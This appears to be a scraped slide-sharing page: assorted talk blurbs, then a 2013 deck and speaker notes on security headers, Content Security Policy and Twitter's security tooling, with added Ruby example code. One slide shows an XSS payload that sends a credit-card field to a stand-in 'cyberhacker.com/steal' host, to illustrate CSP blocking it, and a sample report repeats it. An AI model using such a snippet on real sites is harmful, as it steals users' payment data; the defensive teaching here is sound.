This document discusses various techniques for improving application security, including content security policy (CSP), security headers, static and dynamic analysis tools, and monitoring tools. It provides information on how CSP works and how to configure different security headers to harden applications against attacks like cross-site scripting and clickjacking. The document also notes the importance of monitoring applications for security issues and tuning policies based on monitoring data.
Alexis max - Creating a bot experience as good as your user experience - Alexis... (WeLoveSEO)
Creating a bot experience as good as your user experience: what does technical SEO look like in 2019?
In this talk, given in English and French, Alexis Sanders and Max Prin, Technical SEOs at Merkle in the United States, tackle the most technical SEO topics.
Structured data, crawl budget, AMP: they will give you the keys to building a bot experience as well optimised as the one your users get.
Redefining technical SEO & how we should be thinking about it as an industry ... (WeLoveSEO)
It’s time to throw the traditional definition of technical SEO out the window. Why? Because technical SEO is so much bigger than just crawling, indexing, and rendering. Technical SEO is applicable to all areas of SEO, including content development and other creative functions. Join this session to learn how to integrate technical SEO into all areas of your SEO program.
Google Algorithms, Your Site, and Moving towards Mobile First indexing in a Post Update World.
What you need to know about the changes in Google, how it affects your site, and what you can do to stay ahead of the game when Google changes all the rules in an environment of decreasing transparency.
http://fr.droidcon.com/2014/agenda/
http://fr.droidcon.com/2014/agenda/detail?title=Death+to+Passwords
User authentication in mobile applications is a very common and integral use case. Implementing regular passwords is an easy solution for developers but comes with several pitfalls that impair user experience like (re-)entering passwords, the need to create a new unique password or even just the input of personal data on a flaky keyboard while registering a new account.
This talk discusses the security flaws and UX implications of passwords and highlights the different techniques that can offer a more mobile-friendly flow. Covering authorization and authentication techniques like OAuth and OpenID Connect, and even hardware features like Bluetooth Low Energy, it will be interesting for anyone facing a situation where creating and storing user accounts matters.
Speaker : Tim Messerschmidt, PayPal
As a long-time mobile and web developer, Tim channels his knowledge and experience as PayPal's Lead Developer Evangelist in EMEA. He is passionate about startups and serves as a mentor at multiple incubators and accelerators. Prior to joining PayPal, Tim worked with Neofonie Mobile and Samsung, focusing on several mobile projects. In his spare time, he leads and creates training classes on all sorts of developer-oriented topics, contributes to open source projects and is one of the authors of the Mobile Developer's Guide to the Galaxy, as well as numerous articles published in print magazines.
Sucuri Webinar: Defending Your Google Brand Reputation and Analytics Reports (Sucuri)
Google Analytics and Google Search Console are powerful tools for marketers, but did you know they can also be used to enhance your website security?
Learn how to clear spam from GA reports and mitigate indicators of a website hack.
Sucuri Webinar: How to clean hacked WordPress sites (Sucuri)
Discovering if your site has been compromised and fixing your site can be quite a tedious and overwhelming task.
Sucuri Remediation Team Lead Ben Martin presented the key indicators you should look for when assessing the security of your WordPress site and the steps to take to clean it. Ben provided a guide that is sure to be helpful if your website becomes compromised and will help minimize the attack time.
Sucuri Webinar: Website Security Primer for Digital Marketers (Sucuri)
During this webinar, Alycia will explain how marketing professionals can easily add security to their diverse toolkit. This skill helps organizations prepare for incidents and prevent others.
Reputation management falls on marketing. By championing the protection of web content, marketers can uphold their company’s reputation and make the web safer for everyone.
Sucuri Webinar: WAF (Firewall) and CDN Feature Benefit Guide (Sucuri)
Sales Enablement Webinar 3 of 4. We will be covering our Firewall and CDN.
A feature benefit guide for our agencies and end users. Why use our firewall? What kind of protection does it offer? How does it affect the efficiency and speed of my site? Will it affect my server's resources? Find out the answers to these questions and more:
- 14 POPs around the world. Find out where.
- Tips on how to sell different CDN and Firewall features.
- Discover how to block different global locations. Yes, you can!
...plus other neat information on obscure settings!
Webinar: CWAF for Mid Market/Enterprise Organizations (Sucuri)
In today's complex security landscape, web applications pose a significant risk to Mid-Market and Enterprise organizations.
The question is, how can an organization secure its web properties without sacrificing performance? The answer may be a cloud-based Web Application Firewall.
This webinar will introduce the concept of the CWAF, and the benefits of web application security in the cloud.
Samples of topics covered include:
- What is a cloud-based web application firewall
- The benefits of using a CWAF
- How to improve security and performance
- How to implement a CWAF in complex web environments
This live Q&A-based webinar is designed for development managers, large websites with unique and complex infrastructure/server environments, and anyone who is concerned about securing their web applications.
Insights provided in the webinar will help you operate more secure networks, infrastructure, and web applications.
You can see the video recording of this webinar at the end of the slides.
Sucuri Webinar: What is SEO Spam and How to Fight It (Sucuri)
How and why does SEO spam infect a website? This webinar will discuss what attackers gain from spam campaigns and how to deal with it effectively. We will cover different types of SEO spam and why your website can be a target. You will also learn how to protect your website from these attacks.
Topics include:
- What is SEO spam?
- How does SEO spam infect your website, and why?
- Should you worry if you have a small website?
- How to detect SEO spam.
- How to protect your website against SEO spam.
More webinars at https://sucuri.net/webinars
Join us as we delve into the minds of website hackers and reveal how to fight them.
At Sucuri, we clean hundreds of sites daily, so we see the type of malware that’s injected into sites. This gives us a better understanding of why attacks happen.
We’ll dive into the game of website security and explain the reasons behind it all:
- Targeted attacks
- Random attacks
- SEO attacks
- Why me?
Neil Walker from made Notable will discuss secure search: its past, impact and future. It was big news when Google first announced HTTPS as a ranking signal in August 2014, so what impact has this had for businesses, should brands and webmasters update to HTTPS, and what tools and advice are needed to ensure a website meets Google's guidelines?
This webinar will cover:
1. History of Https
2. The impact – Winners & Losers
3. Tools and advice to help you switch
4. The future of https as a ranking signal
The life of breached data and the attack lifecycle (Jarrod Overson)
OWASP RTP Presentation on Data breaches, credential spills, the lifespan of data, credential stuffing, the attack lifecycle, and what you can do to protect yourself or your users.
Our Website Hacked Trend Report provides insights on the top open-source CMS security, out-of-date software, and specific malware families we see on hacked websites in the Sucuri environment.
We’ve built this analysis from prior reports to identify the latest tactics, techniques, and procedures (TTPs) detected by our Remediation Group. A total of 18,302 infected websites and 4,426,795 cleaned files were analyzed in our recent publication.
Tony will discuss high-level findings on a range of topics, including:
- Affected open-source CMS applications
- Outdated CMS and blacklist analysis
- Malware families and their effects
Sucuri Webinar: How to Clean a Hacked Magento Website (Sucuri)
TIP: Make sure you scroll to the last slide to view the video recording.
On Feb 22, 2017, Sucuri Incident Responder, Cesar Anjos, presented this webinar as a step by step guide on how to clean a hacked Magento website.
If your Magento website has been hacked, learn how to appropriately deal with the security incident, fix the hack, and secure your ecommerce website against future breaches.
This webinar will take place on Wednesday, Feb 22nd at 11am PST. Following his presentation, Cesar will take questions from participants. Please complete the form to register.
In this webinar you will learn how to:
- Understand if there has been a compromise - Beginner
- Determine the presence of credit card stealers - Intermediate/Advanced
- Look for the most common credit card stealers - Intermediate
- Handle potential data breaches - Intermediate
- Remove most Magento infections - Beginner
Sucuri Webinar: Simple Steps To Secure Your Online Store (Sucuri)
During this webinar, we'll discuss some basic security concepts for your online store that include what tools you'll need to remain PCI compliant as well as how to keep your data safe. Some key takeaways will include:
- Reducing Your Attack Surface
- Protecting Cardholder Data
- Creating a Disaster Recovery Plan
We'll also identify principles and practices that can address multiple PCI requirements at once to help save time and effort.
My talk from Digital Elite Day 2020 (Conversion Elite track).
I go over the main changes in browser tracking protections since as early as 2003 (Safari version 1). Then I discuss the impact these tracking protections have on digital analytics, advertising, and experimentation.
In this webinar, we will highlight the different types of hacks, how they work, and what to do post-hack.
We will also share some examples of hacked websites and discuss the most common methods attackers use to target them, plus how they determine if your site is a worthy candidate and how they operate once access is gained.
A few takeaways from this webinar include:
- How do you define a hack?
- What are the OWASP Top 10?
- What is a back door?
- XSS, SQL injection, and others
My presentation titled "Browsers eat data quality for breakfast" from SuperWeek 2020.
The presentation introduces the "tracking protection / prevention / blocking" mechanisms implemented in the major browsers.
The information comes from the www.cookiestatus.com service.
Logs: Understanding Them to Better Manage Your WordPress Site (Sucuri)
In this webinar we will highlight the various activity, access, and error logs WordPress site administrators have at their fingertips. Plus, learn how logs can best be used to manage, troubleshoot, and most importantly, secure your sites.
From this webinar you will learn how to:
- Highlight suspicious activity before it becomes a security issue.
- Identify possible malicious activity in the log files, allowing you to thwart attacks.
- Trace back a malicious user’s activity in a post-compromise scenario.
- Utilize log file information to better protect, manage, and improve user accountability.
A brief introduction to business models based on creative commons.
How business can make more money by sharing
How creative commons can be promoted through illustrating the business potential
Spreadsheets have come a long, long way over the years, and plenty of companies today are duking it out to build the best one. So we took a look at the evolution of the spreadsheet and which elements make the best one to serve the way you work today and into the future.
Everyone wants to become the CEO of a company, but many lack initiative and are unable to influence others. This presentation will help them understand what makes a CEO and how to become one.
Decentralized Social Networks - WebVisions 2009 (David Recordon)
One theme of 2008 that has led into 2009 is the idea of social networks transforming from monolithic individual sites to peer sites that share people, content, information.
Technologies such as OpenID, OAuth, OpenSocial and Portable Contacts can be combined to help create this vision, though what will it actually look like when it works?
This talk will look at the philosophical changes being led by companies like MySpace, Google, Plaxo and Six Apart, their impact on social networks like Facebook which traditionally haven't embraced this vision, and how these technologies are being used to make this vision reality.
Predicting rainfall using ensemble of ensembles (Varad Meru)
The Paper was done in a group of three for the class project of CS 273: Introduction to Machine Learning at UC Irvine. The group members were Prolok Sundaresan, Varad Meru, and Prateek Jain.
Regression is an approach for modeling the relationship between data X and the dependent variable y. In this report, we present our experiments with multiple approaches, ranging from Ensemble of Learning to Deep Learning Networks on the weather modeling data to predict the rainfall. The competition was held on the online data science competition portal ‘Kaggle’. The results for weighted ensemble of learners gave us a top-10 ranking, with the testing root-mean-squared error being 0.5878.
Over the last few years infographics have rocketed into the public consciousness as a visual storytelling method. As with any creative outlet there are good and bad examples; in this talk we'll explore what makes a good infographic, what to consider before you start sketching, and work through some methods for creating one: breaking down the data set to find the best story, constructing the correct story flow, understanding how to construct a clear story and why it is important. It could be useful to anyone who would like to create infographics, improve their skills if they are just starting out, or understand how to use infographics as part of their storytelling.
2013: OC Rails Jan - SecureHeaders library and content security policy (Neil Matatall)
Discusses the various security-related browser response headers and the benefits around them. Also introduces the secureheaders gem (https://github.com/twitter/secureheaders) which simplifies the application
Telco Cloud: How operators are using the Cloud to unlock the core network and ... (Alan Quayle)
Telco Cloud, How operators are using the Cloud to unlock the core network and drive innovation, by Adam Kalsey of Tropo. TADSummit 12-13 November 2014, Istanbul.
In this report, Rishidot Research analyst Sateesh Narahari looks at the data around Serverless Architectures in the public web to analyze if this is a beginning of a new trend in IT.
A Drupalcon Chicago presentation for coders/developers about web application security in the Drupal system. Covering Cross Site Scripting and Cross Site Request Forgeries.
Mitigate Maliciousness -- jQuery Europe 2013 (Mike West)
jQuery has made it possible for developers to move more and more complex application logic down from the server to the client. This is a huge opportunity for JavaScript developers, and at the same time presents a tempting target for folks with malicious intent. It's more critical than ever to ensure that we're doing the right things with regard to security, and happily, modern browsers are here to help. Here, we'll talk about some of the new ways in which you can mitigate the effects of cross-site scripting and other attacks.
When approached with a question, librarians create context for understanding using communication skills and their ability to navigate available resources. IAs can do a similar thing for co-workers inside an organization.
Using my ongoing experience in Special Projects, we’ll look at how IA tools, processes, and thinking can be used to solve support and maintenance issues in an organization. I’ve worked with people in different product groups and roles, including those with direct customer interaction, developers, testers, and various levels of management. I’ve helped them see connections between existing products and technologies, design a complex future product as part of a “task force”, and generally answer (and be able to ask!) all sorts of questions.
Along the way, I’ve discovered and added various tools to my bag of tricks. We’ll take a look at these unexpected tools and how they can be used to explore certain types of information problems.
2012: Putting your robots to work: security automation at Twitter (Neil Matatall)
How the Twitter product security team does automation and where we're going. All tools in the presentation were built on open source technology and will be open sourced over time.
Credentials are not passed around when source code is shared.
Unintentional exposure of source code does not reveal credentials.
Read-access to source code can be much more permissive.
Source code can be checked into version control systems without concern for exposure of credentials.
It is easier to change credentials without having to worry about changing all instances.
Leaving credentials in source code leads to poor password management in general. If changing a credential requires you to change code, you are less likely to want to do it.
2. @LASCONATX April 2013
@ndm | @SeeEssPee | @sadb | @twittersecurity
It’s all about me
I’ve been called a jackass
I’ve been called an “appsechole”
I have opinions
Opinions are often wrong
Please disagree with me
That’s how we learn
Do you use these?
Content security policy
X-Frame-Options
HTTP Strict Transport Security
X-Xss-Protection
X-Content-Type-Options
I’m already bored
Time to get awesomer
Security headers
Leverage the browser for security
Sweeeeet. I don’t have to write secure code!
X-Content-Type-Options
Fixes MIME sniffing attacks
Only applies to IE, because only IE would do something like this
X-Content-Type-Options: nosniff
zzzzZZZZZZzzzzz
X-XSS-Protection
Use the browser’s built-in XSS Auditor
X-XSS-Protection: [0-1](; mode=block)?
X-XSS-Protection: 1; mode=block
zzzzZZZ... huh? zzzzzzzz
X-Frame-Options
Protects you from most classes of clickjacking
X-Frame-Options: DENY
X-Frame-Options: SAMEORIGIN
X-Frame-Options: ALLOW-FROM https://example.com
zzz... oh hey, that’s cool. Don’t frame my stuff.
Firesheep / sslstrip
Given I don’t have an HSTS header
And I have a session
When I visit http://example.com
Then I am pwned
Other SSL fails
Posting passwords over HTTP
Loading mixed content
Using protocol-relative URLs
How hard is it to use?
Base case
Strict-Transport-Security: max-age=10000000
Do all of your subdomains support SSL?
Strict-Transport-Security: max-age=10000000; includeSubDomains
Content secur-a-wat?
Content security policy is reshaping the security model
It is a complicated spec with great differences across browsers
It is not widely adopted
However!
It completely eliminates reflected and stored XSS
It ensures that you never load mixed content
It allows you to accept arbitrary HTML code from users
27. @LASCONATX April 2013
Get rid of XSS, eh?
A script-src directive that doesn't contain 'unsafe-inline' almost eliminates most forms of cross-site scripting.
I WILL NOT WRITE INLINE JAVASCRIPT
I WILL NOT WRITE INLINE JAVASCRIPT
I WILL NOT WRITE INLINE JAVASCRIPT
I WILL NOT WRITE INLINE JAVASCRIPT
I WILL NOT WRITE INLINE JAVASCRIPT
I WILL NOT WRITE INLINE JAVASCRIPT
I WILL NOT WRITE INLINE JAVASCRIPT
30. @LASCONATX April 2013
But I have to...
OK, then I’ll inject:
<script>
var image = new Image();
image.src = "cyberhacker.com/steal?data=" + $('#credit_card').val();
</script>
FALSE! img-src violation, no XHR allowed
33. @LASCONATX April 2013
How to apply?
Secure headers! (poor name, I know)
Open sourced earlier this year
https://github.com/twitter/secureheaders
34. @LASCONATX April 2013
How does it work?
It sets a before_filter that applies each header
Values are based on options passed to filter, or in an initializer
Easily overridden
Secure by default!!!
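The same idea in miniature, as an added example that is not the secureheaders gem's own code: a Rack-style middleware that applies the headers from this deck with secure defaults and lets an app override or drop individual headers. The class name, the nil-means-drop override convention and the /csp-report path are assumptions.

```ruby
# Added example: a minimal Rack-style middleware that applies the headers from
# this deck with secure defaults. It is NOT the secureheaders gem's code; the
# class name, override convention and /csp-report path are assumptions.
class SecureHeadersMiddleware
  DEFAULTS = {
    'X-Content-Type-Options'    => 'nosniff',
    'X-XSS-Protection'          => '1; mode=block',
    'X-Frame-Options'           => 'SAMEORIGIN',
    # Base case from the HSTS slide; add "; includeSubDomains" only once
    # every subdomain serves HTTPS.
    'Strict-Transport-Security' => 'max-age=10000000',
    # No 'unsafe-inline' in script-src, so injected inline script is blocked
    # and reported instead of executed.
    'Content-Security-Policy'   =>
      "default-src 'self'; script-src 'self'; img-src 'self'; report-uri /csp-report",
  }.freeze

  # overrides: header name => new value, or nil to drop that header entirely.
  def initialize(app, overrides = {})
    @app = app
    @overrides = overrides
  end

  # Secure defaults merged with per-app overrides (nil removes a header).
  def self.build_headers(overrides = {})
    headers = DEFAULTS.dup
    overrides.each do |name, value|
      if value.nil?
        headers.delete(name)
      else
        headers[name] = value
      end
    end
    headers
  end

  def call(env)
    status, app_headers, body = @app.call(env)
    secure = self.class.build_headers(@overrides)
    # Browsers ignore HSTS over plain HTTP, so only emit it on HTTPS responses.
    secure.delete('Strict-Transport-Security') unless env['rack.url_scheme'] == 'https'
    # Headers the app set explicitly win; everything else gets the secure default.
    [status, secure.merge(app_headers), body]
  end
end

# Usage (sample app and env are constructed for the example):
APP = ->(_env) { [200, { 'Content-Type' => 'text/html' }, ['<p>hi</p>']] }
```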
35. @LASCONATX April 2013
What about that security policy thingy
There are > 6 differences between these two header values
36. @LASCONATX April 2013
Yay for standards
https://t.co/f26WWx3r7y
38. @LASCONATX April 2013
Long hair don’t care
About browser inconsistencies
39. @LASCONATX April 2013
W3
Get involved!!!
Key results from F2F in San Jose
40. @LASCONATX April 2013
Line numbers and column numbers
Previously, a report that was caused by inline scripts/styles was cryptic
Original FF implementation contained a script-sample
Evals/inserting script into DOM would be buried in minified JS
41. @LASCONATX April 2013
“sudo for javascript”
Bookmarklets/plugins/etc
How should they behave?
Bookmarklets show clear intention
Plugins somewhat questionable
Need to live outside the control of the parent page
But how?
42. @LASCONATX April 2013
Reporting cross-origin
Original implementation did not allow CSP reports to be sent to a URI that does not match the same origin policy, using the eTLD
e.g. https://ads.twitter.com can send reports to https://twitter.com, but not http://twitter.com or https://support.twitter.com or https://twitter.com:3000
As a result of the W3C face to face, the 1.0 spec shall say that reports can be sent anywhere!
However, cross-origin requests not allowed by CORS will be "unauthenticated"
43. @LASCONATX April 2013
script-(nonce|hash)
The clash of the titans
My name is Alex Smolen, this is Neil Matatall and this is Justin Collins. We're on Twitter's Product Security team and today we're going to talk to you about security automation at Twitter.
Content security policy defines what can "run" on a page, and any deviation creates an alert. Twitter was an early adopter. We saw that this could not only potentially protect our users, but give a large number of data points as to what the user is experiencing. We have used CSP to help detect XSS and mixed content by leveraging the reports sent to us by the users' browsers. This complements the static and dynamic analysis provided by brakeman and phantom-gang in a unique way, as we are receiving information from the user. We send the CSP reports to a central scribe host (describe: massively scalable endpoint to collect and aggregate large amounts of data) which writes to the Hadoop file system, which we can run "big data" reports against using pig/scalding. We send this information to SADB where we can search and sort more easily.
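As an added example that is not part of the deck or Twitter's pipeline, a Ruby classifier for the JSON reports a browser posts to report-uri, sorting them into the buckets this talk cares about: inline-script violations (which carry the line/column and script-sample fields from slide 40), mixed content, extension noise, and loads to origins the policy never allowed. Field names follow the CSP report format; the sample reports are constructed.

```ruby
require 'json'
require 'uri'

# Added example (not Twitter's CSP pipeline): classify the JSON violation
# reports browsers POST to report-uri, the way the talk describes using them
# to spot XSS and mixed content. All reports below are constructed samples.
SAMPLE_REPORTS = [
  { 'csp-report' => { 'document-uri' => 'https://example.com/home',
      'violated-directive' => "script-src 'self'", 'blocked-uri' => 'self',
      'line-number' => 12, 'column-number' => 8,
      'script-sample' => 'alert(document.cookie)' } },
  { 'csp-report' => { 'document-uri' => 'https://example.com/home',
      'violated-directive' => "img-src 'self'",
      'blocked-uri' => 'http://cdn.example.com/logo.png' } },
  { 'csp-report' => { 'document-uri' => 'https://example.com/home',
      'violated-directive' => "img-src 'self'",
      'blocked-uri' => 'https://cyberhacker.com/steal?data=4111' } },
  { 'csp-report' => { 'document-uri' => 'https://example.com/home',
      'violated-directive' => "script-src 'self'",
      'blocked-uri' => 'chrome-extension' } },
].map(&:to_json).freeze

def classify_csp_report(json)
  r = JSON.parse(json).fetch('csp-report')
  directive = r['violated-directive'].to_s.split.first
  blocked   = r['blocked-uri'].to_s
  doc       = URI(r['document-uri'].to_s)

  # Extensions and bookmarklets ("sudo for javascript") trip the policy but
  # are not page bugs; keep them out of the XSS queue.
  return :extension_noise if blocked.start_with?('chrome-extension', 'moz-extension', 'safari-extension')
  # An inline script blocked by a script-src without 'unsafe-inline' is either
  # injected markup or a developer writing inline JS; browsers label it
  # "self", "inline" or an empty blocked-uri. line/column and script-sample
  # in the report say exactly where.
  return :possible_xss if directive == 'script-src' && ['self', 'inline', ''].include?(blocked)
  # A blocked http:// resource on an https:// document is mixed content.
  return :mixed_content if doc.scheme == 'https' && blocked.start_with?('http://')
  # Anything else: a load to an origin the policy never allowed, e.g. the
  # image beacon from the slide, which the policy stopped and reported.
  :unexpected_origin
end

# Tally a batch of reports by class, as a SADB-style summary would.
def summarize_csp_reports(reports)
  reports.each_with_object(Hash.new(0)) { |j, h| h[classify_csp_report(j)] += 1 }
end
```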
With the help of whitehats, we tracked down and fixed a lot of these bugs.
For example, we can use static analysis to check for common coding problems, dynamic analysis for obvious problems on websites, and maybe CSP to get XSS reports to us sooner
The first is that we believe writing secure code is not just a technical challenge, but also a social one, and tools should be built to support and enhance existing social processes. Unless it's one person writing, analyzing, and shipping code, communicating about vulnerabilities is just as important as finding them. And effective communication is really hard. We're not talking about emailing a huge report of maybe-bugs to a project manager. We're talking about delivering all of the necessary information to diagnose and fix a vulnerability in a simple and user-centered view.
The next principle is about finding and fixing things as quickly as possible. It's not a new idea, but as a guiding principle it leads you to be ruthless about bottlenecks, latencies, and root causes.
There are a lot of ways to find security problems, and you get diminishing returns from each. We have tools that live on our servers, tools that live outside our servers, and tools that live in our users' browsers, all meant to catch different types of issues.
Most people want to do the right thing. We want to make it easy for them.
Take a survey
Many of these headers encourage best practices while also providing a better user experience and saving resources
save resources since nothing is framed
Twitter has had clickjacking problems in the past. While xfo does not solve all clickjacking issues, it does solve a very common case and is generally a very quick win that is easy to integrate.
hsts preload and max-age
Explain how redirecting to HTTPS doesn't protect the initial request. HSTS also saves a round trip.
Explain mixed content: MITM of assets, Firesheep, cookies sent in the clear. Supported in WebKit (phantomjs). Accept arbitrary HTML and stay safe, because inserted scripts won't execute: on* events, javascript: URIs; restrict using eval.
Script tags, on* events, javascript: hrefs. Even mention inline style. As a policy, no inline script should be added; a moratorium on inline script was well received.
A report from one of our wonderful whitehat reporters gave us a drop of happiness when he said that a successful XSS attempt had been thwarted by CSP. TRANSITION: we took stock of what headers were implemented on our properties, and we were not satisfied. They were applied inconsistently and by a variety of one-off methods.
Mention the GitHub blog post. There are a few, mostly well-known, ways to solve this: data attributes, blocks of code parsed as JSON. Mention the application of the header.
strings or hashes
Caching and hosted content concerns
Talk about custom elements: being able to attach one-way behavior like framing in a sandbox, solving the clickjackable follow button; HTML/DOM-aware templating; resource integrity.
Yeah, some browsers protect you, but not all support it
Given that the browsers give us some baked-in security and they take a relatively small amount of effort to implement, why aren't they more common? It's a non-intrusive, easily configured way of ensuring that all requests get the necessary headers applied. We created a gem for Rails applications, and we intend to apply the same logic to our other frameworks as well.